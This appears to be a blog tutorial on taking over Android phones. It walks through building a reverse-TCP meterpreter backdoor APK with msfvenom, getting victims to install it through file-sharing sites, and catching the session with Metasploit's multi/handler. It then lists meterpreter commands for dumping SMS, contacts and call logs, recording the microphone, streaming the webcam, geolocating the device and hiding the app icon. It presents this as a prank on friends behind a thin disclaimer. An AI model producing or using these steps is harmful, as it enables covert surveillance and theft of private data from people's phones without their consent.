Yes you read right. You can How to hack android phone using kali linux 2020 (with pictures) very easily. Here I will be showing you steps by step on how to How to hack android phone using kali linux 2020 (with pictures) . But remember it is illegal to hack without permission and is punishable.
In this 2020 era we are locked in our home and we need to enhance our technical skills in order to be practically strong.
This is a good time for IT lovers to trick/prank your friends.
Believe me, they will totally be shocked.
When I tried this trick none of my friends were believing me that I really hacked their android phone using kali linux.
And finally i tricked them by sending SMS from the victim phone to one of my friend who was already present. They were just fighting why you sent me that SMS.
Required Materials on How to hack android phone using kali linux 2020
- Kali Linux ISO image
- Pendrive (minimum 8GB)
- Rufus Bootable Pendrive software
- Data Cable for file transfer.
- Internet connection for both hacker and victim.
Above all follow these steps
Thus start with knowing your IP Address
- Click here if you don’t know how to check IP address in Kali Linux
- Open Terminal.
- First type ifconfig to know your IP address (If you are connected with Ethernet cable you will find your IP in eth0 in the same way If you are connected with WiFi you will find your IP in wlan0).
- As I am using Ethernet cable my IP will show in eth0 and my IP is under the red box.
Backdoor.apk making procedure starts from here
- Type msfvenom -p android/meterpreter/reverse_tcp lhost=(your IP) lport=(port number)> /root/backdoor.apk and hit enter. (This will make an apk name backdoor.apk).
- In port number you can type 4000, 4080, 443 etc but not greater than 65000.
- backdoor.apk is the hacking apk which will be used to hack android phone. Which needs to be installed in android phone of victim and victim needs internet connection (If there is no internet connection, hacking will not operate).
- Apart from this you can share this file using various file sharing websites like Wetransfer (this website don’t require user registration).
- Finally You will find the backdoor.apk in Home directory.
Absolutely the last step
- First type msfconsole and hit enter.
- When the msfconsole menu opens type use multi/handler hit enter
- Type set payload android/meterpreter/reverse_tcp hit enter
- Then Type set lhost (IP which you type in making backdoor.apk) hit enter
- Last but not least type set lport (same port number in making backdoor.apk) hit enter
- And then type exploit hit enter
- After hitting enter, a meterpreter session will start shortly if the victim is online.
- Definitely you will be connected to victim’s android phone if he/she is online which shows that how easily you have learnt how to hack android phone using Kali Linux .
- Now type help hit enter
You will find number of commands to control over the victim’s android phone. Scroll and type the required commands (Source – Kali Linux terminal) which you need. Below are the core commands when you type help.
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
File system Commands
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as localtime Displays the target system's local date and time pgrep Filter processes by name ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS
User interface Commands
Command Description ------- ----------- screenshot Grab a screenshot of the interactive desktop
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam
Audio Output Commands
Command Description ------- ----------- play play an audio file on target system, nothing written on disk
Command Description ------- ----------- activity_start Start an Android activity from a Uri string check_root Check if device is rooted dump_calllog Get call log dump_contacts Get contacts list dump_sms Get sms messages geolocate Get current lat-long using geolocation hide_app_icon Hide the app icon from the launcher interval_collect Manage interval collection capabilities send_sms Sends SMS from target session set_audio_mode Set Ringer Mode sqlite_query Query a SQLite database from storage wakelock Enable/Disable Wakelock wlan_geolocate Get current lat-long using WLAN information
This is for educational purpose only. Hacking without permission is illegal and is punishable.
Thanks for visiting. KEEP SMILING